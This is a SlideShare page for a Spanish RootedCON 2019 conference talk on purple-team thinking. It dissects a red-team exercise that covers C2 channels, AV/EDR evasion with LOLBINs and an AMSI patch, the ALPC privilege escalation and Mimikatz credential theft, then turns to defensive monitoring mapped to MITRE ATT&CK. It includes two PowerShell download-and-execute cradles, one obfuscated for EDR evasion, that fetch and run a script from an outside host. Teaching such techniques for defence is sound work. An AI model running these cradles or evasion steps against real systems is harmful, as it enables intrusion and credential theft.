SlideShare una empresa de Scribd logo
Purple brain, purple brain...
Un enfoque global de la gestión de riesgos
Red Team & Blue Team
Abraham Pasamar & Carlos Fernández
Who are we?
● Abraham Pasamar
● Ingeniero y Master en Ciberseguridad
● CEO INCIDE (DFIR & SEC.
ASSESSMENT)
● +14 años de experiencia en infosec
(...o lo que viene siendo: un abuelete)
2
● Carlos Fernández
● Ingeniero de Telecos y OSCP
● Coordinador técnico de SEC.
ASSESSMENT en INCIDE
● 87% cafeína
What we do?
3
Equipo Rojo y Equipo Azul
4
Mentalidad dual: Purple Brain
5
● RED TEAM por si mismo no aporta valor a la
empresa que contrata. Debe orientarse a mejorar
la SEGURIDAD
● BLUE TEAM no orientado a AMENAZAS e
IMPACTO no es efectivo
Confianza excesiva en los vendors
6
TRUST
Disección de un ejercicio de Red Team
7
Planteamiento del ejercicio
8
9
El laboratorio
3
El vector de infección
10
1
C&C
ORGANIZACIÓN
2
1 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
3 EVASIÓN PERIMETRO
Laboratorio: Canal de C&C
11
Proxy
Víctima HTTPS
C&C
Switch
Inspección Tráfico
HTTPS
HTTPS
Inspección SSL
Overlay encryption
IDS/IPS
TLS
Domain hunting
Valid SSL Cert
Allowed connection
3
El vector de infección
12
1
C&C
ORGANIZACIÓN
2
1 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
3 EVASIÓN PERIMETRO3 EVASIÓN PERIMETRO
Laboratorio: Ejecución y evasión de AV
LOLBINS API ABUSE
FILE-LESS
OBFUSCATIONPOWERSHELL
SCRIPTING
AV vs EDR
13
Demo: Shellcode cifrado + Regasm (LOLBIN)
14
RegAsm.exe DLL
Maliciosa
Carga Descifra y
ejecuta
Shellcode
conocido
DEMO
Demo: File-less AMSI Patch
15
¿Qué es la AMSI?
Demo: File-less AMSI Patch
16
C2 Server
DownloadString1
Invoke-Expression2
AMSI Patch3
DownloadString
(Script malicioso
conocido)
4
Invoke-Expression5
Inyección de
shellcode en
otro proceso
6
DEMO
Laboratorio: Ejecución y evasión de EDR
17
Laboratorio: Ejecución y evasión de EDR
18
EDR
EDR
1.
2.
+
????
Laboratorio: Ejecución y evasión de EDR
19
EDR
EDR
powershell -c "$wc = (New-Object Net.WebClient);
$wc.Proxy.Credentials=[Net.CredentialCache]::De
faultNetworkCredentials;
$wc.downloadstring('http://rootedcorn.com/main.js
') | iex”
powershell -c "echo ('`$wc = (New-Object
Net.W'+'ebClient);
`$wc.Proxy.Credentials=[Net.CredentialCache]::D
efaultNetworkCredentials;
`$wc.downloadstring(''https://rootedcorn.com/main
.js'') | iex) | iex"
3
El vector de infección
20
1
C&C
ORGANIZACIÓN
2
1 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
3 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
Laboratorio: Ya está, no?
21
3
El vector de infección
22
1
C&C
ORGANIZACIÓN
2
1 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
3 EVASIÓN PERIMETRO
Laboratorio: Hacer llegar el launcher
23
Adjuntos Dominios
Descargas
(inspección SSL)
Laboratorio: Hacer llegar el launcher
24
Spearphishing link Domain Hunting Cats
Laboratorio: Cat Gallery Demo
25
DEMO
Cómo se ha ejecutado el malware?
26
Pistas
Laboratorio: Todo listo
27
3
El vector de infección
28
1
C&C
ORGANIZACIÓN
2
1 EVASIÓN PERIMETRO
2 EVASIÓN LOCAL
3 EVASIÓN PERIMETRO
1 EVASIÓN PERIMETRO
Compromiso inicial
29
Lanzamiento
Compromiso inicial
30
Espera
Compromiso inicial
31
Acceso
Reconocimiento y exfiltración
32
Elevación de privilegios local
33
Elevación de privilegios local
Advanced Local Procedure Call (ALPC) Local Privilege Escalation
Publicada el 28/08/2018 en Twitter por @SandboxEscaper
34
SchRpcSetSecurity
Task Scheduler
comprueba
Fichero .job
C:WindowsTasks
Asigna una DACL
(permisos), como
SYSTEM.
Elevación de privilegios local
35
Fichero .jobC:WindowsTasks
Mecánica del exploit:
Hard Link
Fichero cualquiera
Modificada por payload arbitrario
en formato .dll
Se modifica la
DACL de este
fichero,
otorgándonos
permiso de
escritura!
Fichero .job printconfig.dll
PoC publicada:
Hard Link Cargada por
spoolsv.exe
(SYSTEM)
Elevación de privilegios local
Solución:
Listar tareas programadas
Seleccionar .exe no crítico que se ejecute como SYSTEM
Modificar, descargar y ejecutar exploit
...
Problema: La DLL estaba cargada y no la podíamos sobreescribir aunque
tuviéramos permisos!
36
Elevación de privilegios local
Antes del exploit:
Después del exploit:
37
Elevación de privilegios local
Seguimos....
Sobreescribimos el ejecutable con nuestro payload
Esperamos a que ejecute la tarea programada como SYSTEM
Obtenemos un proceso elevado, controlado por nosotros
38
Reconocimiento para movimiento lateral
39
Reconocimiento para movimiento lateral
40
Victim SGES1001
Windows Server
2008 R2 SP1
Queremos sus
credenciales
RDP
Bob
Sesión
iniciada
Pertenece a
Administradores
de dominio
Acceso a credenciales para elevación en dominio
41
Victim
1. Conexión RDP
enrutada a través
del canal de C2
SGES1001
2. Listado de parches:
KB2871997 instalado
3. Clave de registro
HKEY_LOCAL_MACHINESystem
CurrentControlSetControlSecurity
ProvidersWDigest
sin definir → Credenciales en
claro en memoria
4. Repetimos la
elevación de
privilegios
5. Invoke-
Mimikatz
retocado para
evadir la
detección
6. Obtenemos las
credenciales de
Bob
Ejecución de movimiento lateral privilegiado
42
RDP
WMI
WinRMCredenciales
de Bob
43
Finalizado el ejercicio de Red Team
¿Y ahora qué?
Ejercicio de Red Team: Perspectiva azul
Una vez acabado, es hora de mirar a las acciones realizadas
desde la perspectiva defensiva.
44
Disección del ejercicio: Técnicas adversariales
45
Mitre ATT&CTM Matrix
Diseccionando el ejercicio
46
47
Bitacora
Filosofía defensiva
48
BLOQUEO
MONITORIZACIÓN
TRAZABILIDAD
MITIGACIÓN AUTOMÁTICA
DETECCIÓN TEMPRANA
RESPUESTA EFECTIVA
Ejemplo: Powershell (T1086)
49
●Bloqueo
● ¿Se puede mitigar la ejecución de la técnica?
● Seguramente no es posible deshabilitar o
bloquear powershell y el bloqueo es bypasseable
● Logs >v5
● Logs logs que contienen los comandos de
PowerShell no están habilitados por defecto:
● Script Block Logging
● V2 no logea, deshabilitar v2 para evitar ataques
downgrade
Ejemplo: Powershell (T1086)
50
●Monitorización
● Recopilar, centralizar, establecer alertas
● ¿Usuario de marketing ejecutando PS?
● Comandos ejecutados en horas no previstas
● Patrones sospechosos, etc
Ejemplo: Powershell (T1086)
51
●Trazabilidad
● Logs centralizados
● Logs locales + extensos
● Asegurar volumen suficiente para evitar rotación
rápida
52
● Mentalidad de vigilancia constante
● Proactivos y apasionados, buscad alertas
creativas
● Haceos vuestros propios scripts
● Empezad por mirarlo localmente en maquina
de pruebas o usad una centralización de unas
cuantas máquinas para probarlo
● Windows event collector
● Agentes: osquery, grr, f-response
Mentalidad blue
Conclusiones
PURPLE TEAM (MENTALIDAD PURPLE):
LA FUSION DE AMBOS MUNDOS APORTA MUCHO VALOR
RED TEAM
Por si mismo no es efectivo
Debe orientarse a mejorar la SEGURIDAD
BLUE TEAM
Si no está orientado a AMENAZAS e IMPACTO no es efectivo
Debes poner a prueba el sistema de defensa con ejercicios de
ataque
53
54
● A todo el equipo INCIDE
● Mención especial a SARA RUIZ, responsable
del departamento de auditoría
● A todos los investigadores que comparten
sus trabajos
● A la organización RootedCON, tanto staff
como voluntarios
● Y a todos vosotros por vuestra atención
Agradecimientos
https://www.incide.es
https://twitter.com/1NC1D3
info@incide.es
Contacto
55

Más contenido relacionado

La actualidad más candente

Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
RootedCON
 
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Websec México, S.C.
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
Websec México, S.C.
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
Websec México, S.C.
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
Websec México, S.C.
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are back
Websec México, S.C.
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
Pablo San Emeterio Lopez
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
RootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
RootedCON
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
Jaime Sánchez
 
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
RootedCON
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
Websec México, S.C.
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Websec México, S.C.
 
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
RootedCON
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
Websec México, S.C.
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
RootedCON
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 

La actualidad más candente (20)

Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
 
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are back
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite V...
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
 
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de NmapEscribiendo firmas para el sistema de detección de versiones de Nmap
Escribiendo firmas para el sistema de detección de versiones de Nmap
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 

Similar a Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Alejandro Ramos
 
Introducción a los ejercicios de Red Team
Introducción a los ejercicios de Red TeamIntroducción a los ejercicios de Red Team
Introducción a los ejercicios de Red Team
Eduardo Arriols Nuñez
 
DECEPTION TECHNOLOGY CYBERSECURITY
DECEPTION TECHNOLOGY CYBERSECURITYDECEPTION TECHNOLOGY CYBERSECURITY
DECEPTION TECHNOLOGY CYBERSECURITY
KRASHLANDO
 
Introduccion ethical hacking - chakan
Introduccion ethical hacking - chakanIntroduccion ethical hacking - chakan
Introduccion ethical hacking - chakan
ch4k4n
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)
YuniorGregorio2
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
Carlos Ansotegui Pardo
 
Kali linux v2_re_y_des (1)
Kali linux v2_re_y_des (1)Kali linux v2_re_y_des (1)
Kali linux v2_re_y_des (1)
Polo Perez
 
Penetration testing
Penetration testingPenetration testing
Penetration testinggh02
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
Hacking Bolivia
 
Bsides 2019 rafael_huaman_medina
Bsides 2019 rafael_huaman_medinaBsides 2019 rafael_huaman_medina
Bsides 2019 rafael_huaman_medina
Rafael Huamán Medina
 
Kali_Linux_v2_ReYDeS.pdf
Kali_Linux_v2_ReYDeS.pdfKali_Linux_v2_ReYDeS.pdf
Kali_Linux_v2_ReYDeS.pdf
JoelAlfredoCadenasBr
 
Administración de la seguridad
Administración de la seguridadAdministración de la seguridad
Administración de la seguridad
Ramiro Estigarribia Canese
 
Amenazas windows 10
Amenazas windows 10Amenazas windows 10
Amenazas windows 10
Juan Ignacio Oller Aznar
 
Cobertura de Código con Tests Funcionales
Cobertura de Código con Tests Funcionales Cobertura de Código con Tests Funcionales
Cobertura de Código con Tests Funcionales
atSistemas
 
Spectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saberSpectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saber
Secpro - Security Professionals
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
Mauricio Velazco
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)
Cristian Garcia G.
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerraFutura Networks
 
Manual de David Solis
Manual de David SolisManual de David Solis
Manual de David Solis
Soporteymantenimiento
 

Similar a Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019] (20)

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
 
Introducción a los ejercicios de Red Team
Introducción a los ejercicios de Red TeamIntroducción a los ejercicios de Red Team
Introducción a los ejercicios de Red Team
 
DECEPTION TECHNOLOGY CYBERSECURITY
DECEPTION TECHNOLOGY CYBERSECURITYDECEPTION TECHNOLOGY CYBERSECURITY
DECEPTION TECHNOLOGY CYBERSECURITY
 
Introduccion ethical hacking - chakan
Introduccion ethical hacking - chakanIntroduccion ethical hacking - chakan
Introduccion ethical hacking - chakan
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
 
Kali linux v2_re_y_des (1)
Kali linux v2_re_y_des (1)Kali linux v2_re_y_des (1)
Kali linux v2_re_y_des (1)
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
 
Bsides 2019 rafael_huaman_medina
Bsides 2019 rafael_huaman_medinaBsides 2019 rafael_huaman_medina
Bsides 2019 rafael_huaman_medina
 
3.redes seguridad
3.redes seguridad3.redes seguridad
3.redes seguridad
 
Kali_Linux_v2_ReYDeS.pdf
Kali_Linux_v2_ReYDeS.pdfKali_Linux_v2_ReYDeS.pdf
Kali_Linux_v2_ReYDeS.pdf
 
Administración de la seguridad
Administración de la seguridadAdministración de la seguridad
Administración de la seguridad
 
Amenazas windows 10
Amenazas windows 10Amenazas windows 10
Amenazas windows 10
 
Cobertura de Código con Tests Funcionales
Cobertura de Código con Tests Funcionales Cobertura de Código con Tests Funcionales
Cobertura de Código con Tests Funcionales
 
Spectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saberSpectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saber
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)WINDOWS 2019 HARDENING (Aseguramiento)
WINDOWS 2019 HARDENING (Aseguramiento)
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerra
 
Manual de David Solis
Manual de David SolisManual de David Solis
Manual de David Solis
 

Más de RootedCON

Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
RootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
RootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
RootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
RootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
RootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
RootedCON
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
RootedCON
 
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
RootedCON
 
Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
